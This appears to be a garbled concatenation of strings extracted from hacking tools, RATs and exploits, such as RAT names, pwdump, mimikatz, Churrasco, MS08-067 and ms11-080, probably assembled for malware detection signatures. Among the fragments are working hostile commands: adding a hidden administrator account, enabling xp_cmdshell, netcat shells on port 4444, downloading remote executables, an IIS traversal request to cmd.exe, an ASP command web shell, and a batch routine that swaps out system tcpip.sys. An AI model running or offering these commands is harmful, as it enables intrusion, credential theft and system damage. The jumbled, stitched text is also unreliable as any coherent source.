*mlt* = %*ip* = %*victimo* = %*name* = %[START][DATA]We Control Your Digital WorldRC4InitializeRC4DecryptS
GetHashCodeActivatorop_Equalityd
ProjectDataDESCryptoKeepAliveIPNETROWLogClientMessage|ClientHostget_ConnectedCo$
089ParadoxRATStartRMCamFloodersSlowLarisSHITEMIDset_Remote_ChatM
PlasmaRATAntiEverythingh
sSpyTheSpyw
abccbaDanabccbTKeyloggeruFileTransferTTDownloadSETTINGS#@#@#PluginDataOnPluginMessagee-dataquaverse/crypterQrypt.classJarizer.classURLConnection.class!!<3SAFIA<3!!!!ElMattadorDz!!stub_2.Propertiess
get_CurrentDomainabccbaSpyGateRATabccbaStubX.pdbmonikerStringvirustotal1s
EnableLUA /t REG_DWORD /d 0 /f*A01**A02**A03**A04**A05**A06*HostSettingssevane.tmpcmd_.bata2b7c3d7e4cmd.dllDEFPATHHKNAMEHPORTIPATHPANELPATHROOTURLvirusscanpronoipstreamWebcamDOMAIN_PASSWORDStub.Form1.resourcesf
load/IDload/JarMain.classload/MANIFEST.MFplugins/UnrecomServer.class%d_of_%d_for_%s_on_%s/c ping 127.0.0.1 & del /q \"%s\"=%s&type=%d?photoid=iexplorernet start \"%s\"MicroPlayerUpdate.execmd.exe /c rundll32 \"%s\"CCPUpdate
ShadowTechDownloadContainerSystem.Configuration#
QWERTYUIOPLKJHGMNBVCXZLKJHGFDSData$$00Data$$01%c%sDataping localhost -n 9 /c %s > nulWin32AppShimMainNotifyShimsGetHookAPIsIP-INFONetwork-INFOOS-INFOProcess-INFOBrowser-INFOQueryUser-INFOUsers-INFOSoftware-INFO(from environment) = %sNetUserEnumGetNetworkParamsAccelorator<html><title>12356</title><body>G
<>m__Finally8SecureReverseProxyClientDriveDisplayName<IsError>k__BackingFieldset_InstallPathmemcmpurlHistoryset_AllowAutoRedirectlpInitData<FromRawDataGlobal>d__fm
remove_KeyDownProtectedDatam_hotkeysget_Hour\
mdqsaazere-GCCLIBCYGMING-EH-TDM1-SJLJ-GTHR-MINGW32X
5156windows\\system32\\sethc.exeAppData\\Local\\Temp\\Microsoft Word.exepng&w=800&h=600&ei=CnJcUcSBL4rFkQX444HYCw&zoom=1&ved=1t:3588,r:1,s:0,i:92&iact=rc&dur=368&page=1&tbnh=184&tbnw=259&start=0&ndsp=20&tx=114&ty=58Valid_Global_Groups: checking group membership of '%s\\%s'.Usage: %s [-D domain][-G][-P][-c][-d][-h]-D    default user DomainE
Send Failed.in RemoteThreadw
Get Domain:%s IP Failed.Connect To Server Failed.kernel32.dll^G\\.Sus\"Bu56Load3O MYTMP(iM) VALUES (MarathonTool/Blind SQL injection tool based in heavy queriesS
E-mail: cracker_prince@163.com.\\TracKid Log\\%s.txtCoded by princeTracKid.dll%08x -- %sLON\\OD\\O-\\O)\\O%\\O!\\O=\\O9\\O5\\O1\\O%s%08x.001B
Invalid password hash: %s-= MySql Hash Cracker =- Usage: %s hashHash: %08lx%08lxFound pass: Pass not foundT
ShellFoldDefaultPHotLigh[
S.failed_logins \"Failed Login Attempts\", SELECT ROLE, PASSWORD_REQUIRED FROM SYS.DBA_ROLES ORDER BY ROLESELECT spid 'SPID', status 'Status', db_name (dbid) 'Database', loginame 'Login'bcp.exe <:schema:>.<:table:> out \"<:file:>\" -n -S <:server:> -U <:user:> -P <:L.login_policy_name AS \"Login Policy\", mailto:support@sqldbx.comS.last_login_time \"Last Login\", [ ] Resolving PsLookupProcessByProcessIdThe target is most likely patched.Dojibiron by Ronald Huizer, (c) master@h4cker.us .[ ] Creating evil window%sHANDLEF_INDESTROY[+] Set to %d exploit half succeeded/Churraskito/-->Usage: Churraskito.exe \"command\" fuck,can't find WMI process PID./Churraskito/-->Found token %s wmiprvse.exeSELECT * FROM IIsWebInfoIP - %d; Login - %d; Password - %d; Combination - %dIP - 0; Login - 0; Password - 0; Combination - 0Create %d IP@Loginl;PasswordUBrute.comhttp://210.73.64.88/doorway/cgi-bin/getclientip.asp?IP=N
OnGetPasswordPhttp://www.chinesehack.org/Global\\ps%08xStrStrAStrToIntAnessus_get_socket_from_connection: fd <%d> is closed[*] \"%s\" completed, %d/%d/%d/%d:%d:%d - %d/%d/%d/%d:%d:%dA FsSniffer backdoor seems to be running on this port%s/churrasco/-->Usage: Churrasco.exe \"command to run\"/churrasco/-->Done, command should have ran as SYSTEM!MZKERNEL32.DLLUpackByDwing@E-Mail  : admin@luocong.comHomepage: http://www.luocong.com: %d  -  ustrreffix.dllUltra String Reference plugin v%d.%02dXScanLib.dllPorts/%s/%dDEFAULT-TCP-PORTPlugCheckTcpPortIdtTool.sysI
\\\\.\\slIdtTool[*] Token system command[*] command add user 90sec 90sec[*] Add to Administrators success[*] User has been successfully addedProgram: %s%s%s%s%s%s%s%s%s%s%sc
http://www.vip80000.com/hot/index.htmlGetConnectStringCnCerT.Safe.SSClone.dll(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPGklock.dllE
get_Form1h
Iv\\SmSsWinStationApiPort 
KvInterlockedCompareExchange 
--- ScanMs Tool --- (c) 2003 Internet Security Systems ---Scans for systems vulnerable to MS03-026 vulnMore accurate for WinXP/Win2k, less accurate for WinNTadded %d.%d.%d.%d-%d.%d.%d.%dInternet Explorer 1.0t
-m MINLEN  minimum length of a valid passwordhttp://www.thc.orgUse for hacking: trim your dictionary file to the pw requirements of the target.W
You Already Loaded This DLL ! :(D
Can't Load This Dll ! :( 
<a href=\"http://www.xfocus.net\">X-Scan</a>REPORT-ANALYSIS-OF-HOST\\\\localhostiis.run>Could not connecto %sN
SELECT A.USER FROM SYS.USER_USERS A OCI 8 - OCIDescriptorFreeORACommand *msvbvm60.dll_CIcoscKmhV0
c:\\Documents and Settings\\Administrator\\Got WMI process Pid: %dThis exploit will executeRunning reverse shell<description>CHKen QQ:41901298</description>version=\"9.9.9.9\"name=\"CH.Ken.Tool\"to HOST!SS.EXElstrlen0RtlUnwnc -l -p port [options] [hostname] [port]invalid connection to [%s] from %s [%s] %dpost-rcv getsockname failedFailed to execute shell, error = %sUDP listen needs -p arghttp://www.site.com/test.dll?user=%USERNAME&pass=%PASSWORDUsername: \"%s\", Password: \"%s\", Remarks: \"%s\"user:\"%s\" pass: \"%s\" result=\"%s\"Mozilla/4.0 (compatible; MSIE 4.01; Windows NT)L
clnt_raw.c - Fatal header serialization error.svctcp_.c - cannot getsockname or listentoo many connections (%d), compilation constant FD_SETSIZE was only %dsvc_run: - select failed@(#)bindresvport.cH
RestTool.EXEH
C:\\WINDOWS\\temp\\pojie.exe /l=C:\\WINDOWS\\temp\\s.exeC:\\WINDOWS\\temp\\s.exe tcp explorer.exe http://www.hackdos.comFailed to read file or invalid data in file!WTNE / MADE BY E COMPILER - WUTAO The interface of kernel library is invalid!eventvwrFailed to decompress data!NOTEPAD.EXE result.txtGetLogonS/showthread.php?t=156643sedebugnameValueUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322SOFTWARE\\Classes\\HTTP\\shell\\open\\commandSYSTEM\\ControlSet001\\Services\\%sGlobal\\%s-key-event%d%d.exeGlobal\\%s-key-metuxGET / HTTP/1.1qy001id=%d;qy001guid=%s'SeDebugPrivilegeOpen Author: Cyg07*2from golds7n[LAG]'JDAMAGEUnHook IoGetDeviceObjectPointer ok!\
EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll'Password.txtLoginPromptA
<description>BYTELINKER.COM</description>myupnp.exeC:\\Users\\Tong\\Documents\\Visual Studio 2012\\Projects\\Shift shellC
- Rewritten by HDM last <hdm [at] metasploit.com>- Usage: %s <Target ID> <Target IP>- Remote DCOM RPC Buffer Overflow Exploit- Warning:This Code is more like a dos tool!(Modify by pingker)Windows NT SP6 (Chinese)- Original code by FlashSky and Benjurry\
shell3all.cIsDebug.dllS
(IsDebuggerPresent byte Patcher)Error WriteMemory failedIsDebugPresentidb_AutoloadBin FilesMASM32 versionH
%SystemRoot%\\system32\\PipeCmdSrv.exeP
Please Use NTCmd.exe Run This Program.%s\\pipe\\%s%s%d%s\\ADMIN$\\System32\\%s%sConnecting to Remote Server ...FailedP
fpipe -l 53 -s 53 -r 80 192.168.1.101F
http://www.foundstone.com%s %s port %d. Address is already in usew03a2409.dllR
xsiff.exe -pass -hide -log pass.logHOST: %s USER: %s, PASS: %sxsiff.exe -tcp -udp -asc -addr 192.168.1.1Code by glacier <glacier@xfocus.org>%-5s%s->%s Bytes=%d TTL=%d Type: %d,%d ID=%d SEQ=%dR
OpenProcessCmdExecute!http://www.hackp.com'
SaveSelectedFilterCmdExecutePasswordChar@WSockHook.DLLPsInitialSystemProcess @%pPsLookupProcessByProcessId(%u) FailedPsLookupProcessByProcessId(%u) => %pFirstStage() Loaded, CurrentThread @%p Stack %p - %pdic\\loginlist.txtRadmin.exelamescan3.pdf!dic\\passlist.txtQy001Service/.MIKYC
ProcessXElementset_Timer1Watchdog thread %d waiting on MutexExploit ok run command\\epathobj_exp\\Release\\epathobj_exp.pdbAlllocated userspace PATHRECORD () %pMutex object did not timeout, list not patchedGET /ok.asp?id=1__sql__ HTTP/1.1F
Host: 127.0.0.1AJunk.dllA
ADVAPI32.DLLVERSION.DLLWSOCK32.DLLCOMCTL32.DLLOLEAUT32.DLLGetFileVersionInfoAImageList_AddActivateKeyboardLayoutB
IoDeleteSymbolicLinkIoDeleteDeviceIoCreateSymbolicLinkuser32.dllyruntime errorAppIDFlagsGetLagLookupAccc:\\Users\\careful_snow\\Desktop\\Htran\\Release\\Htran.pdb=========== Code by lion & bkbll, Welcome to [url]http://www.cnhonker.com[/url] T
ntwdblib.dllT
dbnextrow[Usage]:  %s <HostName|IP> <UserName> <Password>=============By uhhuhy(Feb 18,2003) - http://www.cnhonker.net=============Cool! Connected to SQL server on %s successfully!EXEC master..xp_cmdshell \"%s\"=======================Sqlcmd v0.21 For HScan v1.20=======================Error,exit!Sqlcmd>h
_AutoAttackMain_frmIpToAddr!Win32 .EXE.XOLEHLP.dllDtcGetTransactionManagerExAGetUserNameAPacketSendPacketArpSniffpcap_loopSyntax: %s [-i FILE] [-o FILE] [-m MINLEN] [-M MAXLEN] [-c MINSETS] -l -u -n -p PW-Inspectori:o:m:M:c:lunpsP
Match operate system failed, 0x%00004X:%u:%d(Window:TTL:DF)Example: xport www.xxx.com 80 -m syn%s - command line port scannerxport 192.168.1.1 1-1024 -t 200 -vUsage: xport <Host> <Ports Scope> [Options].\\port.iniPort scan complete, total %d port, %d port is opened, use %d ms.http://www.xfocus.orgP
%CommonProgramFiles%\\GetRand.dll<description>IEBars</description>R
GIF89Unlock\\i386\\Hello.pdbOS not supported.N
-->Got WMI process Pid: %d This exploit will execute \"net user net user temp 123456 /add & net localgroup administrators temp /addRunning command with SYSTEM Token...Thread impersonating, got NETWORK SERVICE Token: 0x%xFound SYSTEM token 0x%xThread not impersonating, looking for another thread...P
MSIE 5.5;\
%s -mutex %s -host %s -index %d -config \"%s\"www.target.com%s\\scripts\\desc\\%s.desc%c Active/Maximum host thread: %d/%d, Current/Maximum thread: %d/%d, Time(s): %l%s -f hosts.txt -port -ipc -pop -max 300,20 -time 10000%s -h 192.168.0.1 192.168.0.254 -port -ftp -max 200,20%s -h www.target.com -all.\\report\\%s-%s.html.\\log\\Hscan.log[%s]: Found cisco Enable password: %s !!!%s@ftpscan#FTP Account:  %s/[null].\\conf\\mysql_pass.dicTry the first %d time-->Build&&Change By p r
%d of %d target%s%scompleted, %lu valid password%s found[%d][smb] Host: %s Account: %s Error: ACCOUNT_CHANGE_PASSWORDhydra -P pass.txt target cisco-enable  (direct console access)[%d][smb] Host: %s Account: %s Error: PASSWORD EXPIRED[ERROR] SMTP LOGIN AUTH, either this auth is disabled\"/login.php:user=^USER^&pass=^PASS^&mid=123:incorrect\"used pepack!\\temp\\NtGodMode.exentgod.batsfxcmdC:\\temp\\vncviewer4.log[BL4CK] Patched by redsand || http://blacksecurity.orgfake release extendedVkey 0x%x, keysym 0x%xpipecmd \\\\%s -U:%s -P:\"\" %s[Usage]:  %s <HostName|IP> <Username> <Password>pipecmd \\\\%s -U:%s -P:%s %s============By uhhuhy (Feb 18,2003) - http://www.cnhonker.net===================================NTcmd v0.11 for HScan v1.20=======================NTcmd>mysql_pwd_crack 127.0.0.1 -x 3306 -p root -d userdict.txtSuccessfully --> username %s password %s zhouzhen@gmail.com http://zhouzhen.eviloctal.org-a automode  automatic crack the mysql password mysql_pwd_crack 127.0.0.1 -x 3306 -aC
ServiceCmdShell<!-- If your application is designed to work with Windows 8.1, uncomment the folS
c:\\windows\\system32\\command.com /c Easy Usage Version -- Edited By: racle@tian6.comOH,Sry.Too long command.Success! Commander.Hey,how can racle work without ur command ?The exploit thread was unable to map the virtual 8086 address space[+] Usage: VNC_bypauth <target> <scantype> <option>========RealVNC <= 4.1.1 Bypass Authentication Scanner=======[+] Type VNC_bypauth <target>,<scantype> or <option> for more informationsVNC_bypauth -i 192.168.0.1,192.168.0.2,192.168.0.3,...-vn:%-15s:%-7d  connection closedprogram termingwww.icehack.yoda & M.o.D.-> come.to/f2f **************C:\\TEMP\\$530 Please login with USER and PASS._Shell.exeftpcWaitingPassword@members.3322.net/dyndns/update?system=dyndns&hostname=http://www.xxx.com/xxx.exe@ddns.oray.com/ph/update?hostname=ListViewProcessListColumnClick!http://iframe.ip138.com/ic.aspUsage : ms11-080.exe cmd.exe Command \\ms11080\\ms11080\\Debug\\ms11080.pdb[>] by:Mer4en7y@90sec.org[>] create porcess error[>] ms11-080 ExploitUsage:system_exp.exe \"cmd\"The shell \"cmd\" success!Not Windows NT family OS.Unable to get kernel base address.run \"%s\" failed,code: %dWindows Kernel Local Privilege Exploit h
[ATTEMPT-ERROR] target %s - login \"%s\" - pass \"%s\" - child %d - %lu of %lu(DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=))(COMMAND=reload)(PASSWORD=%s)(SERVICEcn=^USER^,cn=users,dc=foo,dc=bar,dc=com for domain foo.bar.comMYBLOG:HTTP://HI.BAIDU.COM/0X24QUSER_NAMEFROMWWHERED
PortListfNo.533.netexitfckappfree.dllk
support@nirsoft.net0</requestedPrivileges></security></trustInfo></assembly>Pass,Config,n{)phMYSQLZ\\DHLP\\.\\dhlp\\.SHAutoCompleMainFrameK
The ordinal %u could not be located in the dynamic link library %sGetModuleHandleAodbc32.dllE
http://www.wzpg.comipsearcher\\ipsearcher\\Release\\ipsearcher.pdb_GetAddressipsearcher.dllDojibiron by Ronald Huizer, (c) master#h4cker.us  [%s]: Found \"FTP account: anyone/anyone@any.net\"  !!!%s@ftpscan#Cracked account:  %s/%s[%s]: Found \"FTP account: %s/%s\" !!![>] ms11-08 Exploit\\epathobj_exp\\x64\\Release\\epathobj_exp.pdb-
kelloworld.dllk
%s -h 192.168.0.1 192.168.0.254 -port -ftp -max 200,100sfUserAppDataRoaming$TRzFrameControllerPropertyConnectiondelphi32.exehkeyCurrentUser%
Citadel hooking error[%s]: checking \"FTP account: ftp/ftp@ftp.net\" ...[%s]: IPC NULL session connection success !!!Scan %d targets,use %4.1f minuteshttp://blog.gentilkiwi.com/mimikatzBenjamin DelpyGlobalSignC
WBruteerror.txtgood.txtsource.txtbad.txtGenerator IP@Login;Passwordset /p \"=4d5apowershell -Command \"$hex=set+%2Fp+%22%3D4d5powershell+-Command+%22%24hexecho 4d 5a echo r cx >>echo+4d+5a+echo+r+cx+%3E%3E%
WHOSTHERE-ALT v1.1 - by Hernan Ochoa (hochoa@coresecurity.com, hernan@gmail.com) - (c) 2007-2008 Core Security Technologieswhosthere enters an infinite loop and searches for new logon sessions every 2 seconds. Only new sessions are shown if found.dump output to a file, -o filenameThis tool lists the active LSA logon sessions with NTLM credentials.Error: pth.dll is not in the current directory!.the output format is: username:domain:lmhash:nthash.\\pth.dllCannot get LSASS.EXE PID!<cmd>. Create a new logon session and run a command with the specified credentials (e.g.: -r cmd.exe)IAM-ALT v1.1 - by Hernan Ochoa (hochoa@coresecurity.com, hernan@gmail.com) - (c) 2007-2008 Core Security TechnologiesThis tool allows you to change the NTLM credentials of the current logon sessionusername:domainname:lmhash:nthashError in cmdline!. Bye!.Error: Cannot open LSASS.EXE!.nthash is too long!.LSASS HANDLE: %xgenhash.exe <password>Password: %s%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2XThis tool generates LM and NT hashes.(hashes format: LM Hash:NT hash)LSASRV.DLLiamdll.dllChangeCredsiam.exe -h administrator:mydomain:An error was encountered when trying to change the current logon credentials!.optional parameter. If iam.exe crashes or doesn't work when run in your system, use this parameter.IAM.EXE will try to locate some memory locations instead of using hard-coded values.Checking LSASRV.DLL....c:\\debug.txt\"Primary\" string found at %.8Xh\"Primary\" string not found!segment 1 found at %.8Xhspecify addresses to use. Format: ADDCREDENTIAL_ADDR:ENCRYPTMEMORY_ADDR:FEEDBACK_ADDR:DESKEY_ADDR:LOGONSESSIONLIST_ADDR:LOGONSESCould not enable debug privileges. You must run this tool with an account with administrator privileges.-B is now used by default. Trying to find correct addresses..OpenProcessToken() error: 0x%08X%d dumpedAdjustTokenPrivileges() error: 0x%08X\\SAM-%u.dmpextract the TGT session keygetlsasrvaddr.exeCannot get PID of LSASS.EXEPPWDUMP_DATAUsage: %s [-x][-n][-h][-o output_file][-u user][-p password][-s share] machineNaUnable to query service status. Something is wrong, please manually check the stpwdump6 Version %s by fizzgig and the mighty group at foofus.net00050;0F0M0X0a0v0}0vwgvwgvP76Pr0PhOFyPUnable to uninstall the fgexec serviceUnable to set socket to sniffDump system passwordsError opening sam hive or not valid fileCouldn't find LSASS pidsamdump.dllWPEPRO SEND PACKETWPE-C1467211-7C89-49c5-801A-1D048E4014C4Usage: unshadow PASSWORD-FILE SHADOW-FILEarpspoof\\DebugSuccess: The log has been clearedclearlogs [\\\\computernameDumpUsers 1.dictionary attack with specified dictionary fileby Objectif Securiteobjectif-securiteCannot query LSA Secret on remote hostCannot write to process memory on remote hostCannot start PWDumpX service on hostusage: %s <system hive> <security hive>username:domainname:LMhash:NThash<server_name_or_ip> | -f <server_list_file> [username] [password]Impersonation Tokens Availablefailed to parse pwdump format stringDumping password$tt_xml->process( 'end_domainscan.tt', $end_domainscan_vars,NcrackOutputTable only supports adding up to 4096 to a cell viaexcept SqlmapBaseException, ex:Scan Ports EveryScan All Possible Ports!dIJMuX$aO-EVXELUxP\"-\\KaR\"U'}-M,.V.)\\ZDxpLSavDecompress errorCan't load libraryCan't load functioncom0tl32:.dDescription|soft Visual Studio\\VB9ypadj_fptan?4DOWS\\SyMem32\\/oIconExNBTScanner!y&WCAP;}ECTEDNotSupportedSCAN.VERSION{_W
WSocketResolveHost: Cannot convert host address '%s'tcp is the only protocol supported thru socks serverDarkKnightIPStealerUtilities td class=\"summO1\">REM'EBAqRISECorExitProcess'msc#eAuto Scroll BOTH Text BoxesStart/Stop PortscanningAuto Save LogFile by pressing STOPGET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0C:\\Program Files\\Microsoft Visual Studio\\VB98\\VB6.OLBdwGetAddressForObjectColor Transfer SettingsFX Global Lighting AngleVersion compatibility infoNew Windows ThumbnailLayer ID Generator BaseColor Halftone SettingsC:\\WINDOWS\\SYSTEM\\MSWINSCK.ocaDarKPaiN=BITCHIN THREADS)PuMB_syJ&,fARW>yRm3hm3t_rullaz7Projectc1Ten-GGl\"/Moziqlxa0    :SCAN BEGUN ON PORT:0    :PORTSCAN READY.Corrupt Data!K4p~omkIzDllTrojanScanGetDllInfoCompressed by Petite (c)1999 Ian Luck.GetFileCRC32GetTrojanNumberTFAKAboutBasic PortScannerNow scanning port:This program was made by Volker VossJiBOo~SSBexample: iis 10.10.10.10send error<table width=\"60%\" bgcolor=\"black\" cellspacing=\"0\" cellpadding=\"2\" border=\"1\" bordercolor=\"white\"><tr><td>This tool may be used only by system administrators. I am not responsible for _H/EnumDisplay/ECTED.MSVCRT0xNotSupported7NeoWait.exeRRRRRRRWIP.txtxiaoyuers
__GetMainArgsWS2_32.DLLWININET.DLLFreeSidToAsciiRedirect SPort RemoteHost RPort  -->Port RedirectorPOST /scripts/WWPMsg.dll HTTP/1.0http://IP/a.exe a.exe            -->Download A FileHost: wwp.mirabilis.com:80%s -Set Port PortNumber              -->Set The Service PortShell                            -->Get A ShellDeleteService ServiceName        -->Delete A ServiceGetting The UserName(%c%s%c)-->ID(0x%s) Successfully%s -Set ServiceName ServiceName      -->Set The Service Name[ValidateRange(1, 65535)]$Client = New-Object -TypeName System.Net.Sockets.TcpClient$Buffer = New-Object -TypeName System.Byte[] -ArgumentList $Client.ReceiveBufferSizeI
Reply-To: %shtml htm htx aspfor /f \"skip=4 tokens=2,5\" %%a in ('netstat -ano -p TCP') do (in ('tasklist /fi \"PID eq %%b\" /FO CSV') do @echo offG
\\Result.txtBy:ZT QQ:376789051(
for /f \"eol=P tokens=1 delims= \" %%i in (s1.txt) do echo %%i>>s2.txtif not \"%Choice%\"==\"\" set Choice=%Choice:~0,1%Bf **************forming Time: %d/1
del Weak1.txtdel Attack.txtdel /s /Q C:\\Windows\\system32\\doors\\!&start iexplore http://www.crsky.com/soft/4818.html)UUUMUUUfUUUfUUUfUUUfUUUfUUUfUUUfUUUfUUUfUUUfUUUMUUU_CREDSUsing WCE R
This operating system is not supported.Win32 only![LordPE]CRTDLL.dllVBScriptCoUninitializeThe RevelationHelper.DLL file is corrupt or missing.B
RevelationHelper.dllobjShell.Run \"schtasks /change /TN wDw00t /disable\",,TrueobjShell.Run \"schtasks /run /TN wDw00t\",,True'objShell.Run \"cmd /c copy C:\\windows\\system32\\tasks\\wDw00t .\",,Truea.WriteLine (\"schtasks /delete /f /TN wDw00t\")a.WriteLine (\"net user /add ikat ikat\")a.WriteLine (\"cmd.exe\")strFileName=\"C:\\windows\\system32\\tasks\\wDw00t\"For n = 1 To (Len (hexXML) - 1) step 2output.writeline \" Should work on Vista/Win7/2008 x86/x64\"Set objExecObject = objShell.Exec(\"cmd /c schtasks /query /XML /TN wDw00t\")objShell.Run \"schtasks /create /TN wDw00t /sc monthly /tr \"\"\"+biatchFile+\"a.WriteLine (\"net localgroup administrators /add v4l\")Set ts = fso.createtextfile (\"wDw00t.xml\")Extended Module: super mario brothersofpurenostalgicfeeling-supermariobrotheretic!http://132.147.96.202:80iKAT Exe Templatewithadancyflavour..FastTracker v2.00   R
extension: .dllI
Are you alert enough to be using Nmap?  Have some coffee or Jolt(tm).Shinysoft Limited1Shinysoft Limited0Wellington1Wainuiomata156 Wright St1UTN-USERFirst-ObjectNew Zealand1Failed to get temp file for source AES decryptionFailed to get encryption header for pwd-protectFailed to get filetimeFailed to delete temp file for password decoding (3)<IconFile>C:\\WINDOWS\\App.ico</IconFile>Failed to read the entire file<VersionCreatedBy>14.4.0</VersionCreatedBy><ProgressCaption>Run &quot;executor.bat&quot; once the shell has spawned.</PRunning Zip pipeline...<FinTitle /><AutoTemp>0</AutoTemp><DefaultDir>%TEMP%</DefaultDir>AES Encrypting...<UnzipDir>%TEMP%</UnzipDir>/BypassUac/BypassUac/BypassUac_Utils.cpp/BypassUac/BypassUacDll/BypassUacDll.aps/BypassUac/BypassUac/BypassUac.icoB
\\Release\\BypassUacDllW
/x86/BypassUac.exe/x64/BypassUac.exe/x86/BypassUacDll.dll/x64/BypassUacDll.dllAFX_IDP_COMMAND_FAILUREW
steam_ker.dllfor /f %%a in (host.txt) do (for /f \"eol=S tokens=1 delims= \" %%i in (s2.txt) do echo %%i>>host.txtdel host.txt /qfor /f \"eol=- tokens=1 delims= \" %%i in (result.txt) do echo %%i>>s1.txtstart Http.exe %%a %http%del Result.txt s2.txt s1.txt nc [-options] hostname port[s] [ports] ... gethostpoop fuxoredVERNOTSUPPORTED%s [%s] %d (%s) `--%s' doesn't allow an argumentMS08-067 Exploit for CN by EMM@ph4nt0m.orgMake SMB Connection error:%dSend Payload Over!Maybe Patched!RpcExceptionCode() = %up
\\\\%s\\IPCs.exe %s %s %s %s %d /saves.exe start error...%dEXEC sp_addextendedproc xp_cmdshell,'xplog70.dll'EXEC master..xp_cmdshell 'wscript.exe cc.js'Usage:sql.exe [options]%s root %s %d errorPass.txtSELECT sillyr_at_gmail_dot_com INTO DUMPFILE '%s\\\\sillyr_x.so' FROM sillyr_xscan.batGOGOGO.batip.txtfor /f %%i in (ips.txt) do (start cmd.bat %%i)445\\nc.exe445\\s.execs.exe %1445\\cs.exe445\\ip.txt445\\cmd.batNormal Scan: About To Scan %u IP For %u Ports Using %d ThreadSYN Scan: About To Scan %u IP For %u Ports Using %d ThreadExample: %s TCP 12.12.12.12 12.12.12.254 21 512 /BannerSomething Wrong About The PortsPerforming Time: %d/%d/%d %d:%d:%d --> Example: %s TCP 12.12.12.12/24 80 512 /T8 /Save%u Ports Scanned.Taking %d Threads %-16s %-5d -> \"%s\"SYN Scan Can Only Perform On WIN 2K Or AboveSYN Scan: About To Scan %s:%d Using %d ThreadScan %s Complete In %d Hours %d Minutes %d Seconds. Found %u Open Ports@sql.exe -f ip.txt -m syn -t 3306 -c 5000 -u http://60.15.124.106:63389/tasksvr.nc %1 4444for /f \"delims=\" %%x in (endend.txt) do call :lisoob %%xhttp://www.tzddos.com/ -------------------------------------------->byebye.txtren %systemroot%\\system32\\drivers\\tcpip.sys tcpip.sys.bakIF /I \"%wangle%\"==\"\" ( goto start ) else ( goto erromm )copy *.tzddos scan.bat&del *.tzddosdel /f tcpip.sysif /i \"%CB%\"==\"www.tzddos.com\" ( goto mmbat ) else ( goto wangle )call scan.batIF /I \"%erromm%\"==\"\" ( goto start ) else ( goto zuihoujh )IF /I \"%zuihoujh%\"==\"\" ( goto start ) else ( goto laji )sc config LmHosts start= autocopy tcpip.sys %systemroot%\\system32\\drivers\\tcpip.sys > nulren %systemroot%\\system32\\dllcache\\tcpip.sys tcpip.sys.bak123456.com123123.com360.comjuso.comsina.comchangemechinanetlionkingMultithreading Posts_Send KillerGET [Access Point] HTTP/1.1The program's need files was not exist!J
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)  ( /s ) :forms.vbpforms.vcpSoftware\\FlySky\\E\\Installname=\"Microsoft.Windows.Common-Controls\" E
POST %HsRPCRT4.DLLWNetAddConnection2ANdrPointerBufferSize_controlfpfor /f \"eol= tokens=1,2 delims= \" %%i in (ip.txt) do (Blast.bat /r 600Blast.bat /l Blast.batBlast.bat /c 600start Clear.bats syn %%i %%j 3306 /savestart Thecard.batsetlocal enabledelayedexpansionConsys21.dll3
Beijing1del /f /s /q %systemdrive%\\*.log    del /f /s /q %windir%\\*.bak    del /f /s /q %systemdrive%\\*.chk    del /f /s /q %systemdrive%\\*.tmp    del /f /q %userprofile%\\COOKIES s\\*.*    rd /s /q %windir%\\temp & md %windir%\\temp    del /f /s /q %systemdrive%\\recycled\\*.*    del /f /s /q \"%userprofile%\\Local Settings\\Temp\\*.*\"    del /f /s /q \"%userprofile%\\Local Settings\\Temporary Internet Files\\*.*\"   tasklist |find \"Clear.bat\"||start Clear.batHttp://www.coffeewl.comping -n 2 localhost 1>nul 2>nulfor /L %%a in (MODE con: COLS=42 lines=5Text Files (*.txt);;All Files (*)http://ubrute.comIP - %d; Password - %d; Combination - %dget_CrackedCredentialsS
coded by fLaShget_grbToolsScaningCrackingRestore=1Thread=Running=1CheckCombination=AutoSave=1.000000TryConnect=Tray=Programming by JD Glaser - All Rights ReservedUsage - hunt \\\\servername.
SMB share enumerator and admin finder Hunt only runs on Windows NT...User = %SAdmin is %s\\%sERROR!!! Bad host lookup. Program Terminate.ERROR No.2!!! Program Terminate.Local Host Name: %sPacked by exe32pack 1.38Local Computer Name: %sLocal IP Adress: %sArtTrayHookDll.dll?TerminateHook@@YAXXZs
C:\\Program Files\\DevStudio\\VB\\VB5.OLBM
Command1_Clicks
vb5chs.dllMSVBVM50.DLLsystem.dllset sys=server.CreateObject (\"system.contral\") Public Function reboot(atype As Variant)t& = ExitWindowsEx(1, atype)atype=request(\"atype\") AceiveX dllDeclare Function ExitWindowsEx Lib \"user32\" (ByVal uFlags As Long, ByVal sys.reboot(atype)' -- check for a command that we have posted -- 'szTempFile = \"C:\\\" & oFileSys.GetTempName( )<meta http-equiv=\"Content-Type\" content=\"text/html; charset=gb2312\"><BODY><input type=text name=\".CMD\" size=45 value=\"<%= szCMD %>\">Call oScript.Run (\"cmd.exe /c \" & szCMD & \" > \" & szTempFile, 0, True)szCMD = Request.Form(\".CMD\")%s Server.exeService Port: %sThe Port Must Been >0 & <655353--Set Server PortThe Server Password Exceeds 32 CharactersService Name: %sServer Password: %sInject Process Name: %sWinEggDrop Shell CongiratorError get globalgroup memebers: NERR_InvalidComputerError get users from server!get in nt by name and nullget something from nt, hold by killusa.Logon.exeDomain And User:PID=Get Addr$(): Onepsapi.dllKT
iphlpapi.DLLystem\\CurrentCorolSet\\Port.TXV1.2 BGET A HTTP/1.0E
XYZCmd V1.0 For NT S= Click here if you want to get your registered copy of ASPack;  For beginning of translate - copy english.ini into the yourlanguage.iniE-Mail:                      shinlan@km169.net;  Please, translate text only after simbol '='= Compress with ASPackresponse.write \"<a href='index.asp'>if Request.Cookies(\"password\")=\"whichdir=server.mappath(Request(\"path\"))Set fs = CreateObject(\"Scripting.FileSystemObject\")whichdir=Request(\"path\")Hit [Enter] to begin command mode...If you are in command mode,[/l] lists all the drives the monitor is currently attached toF
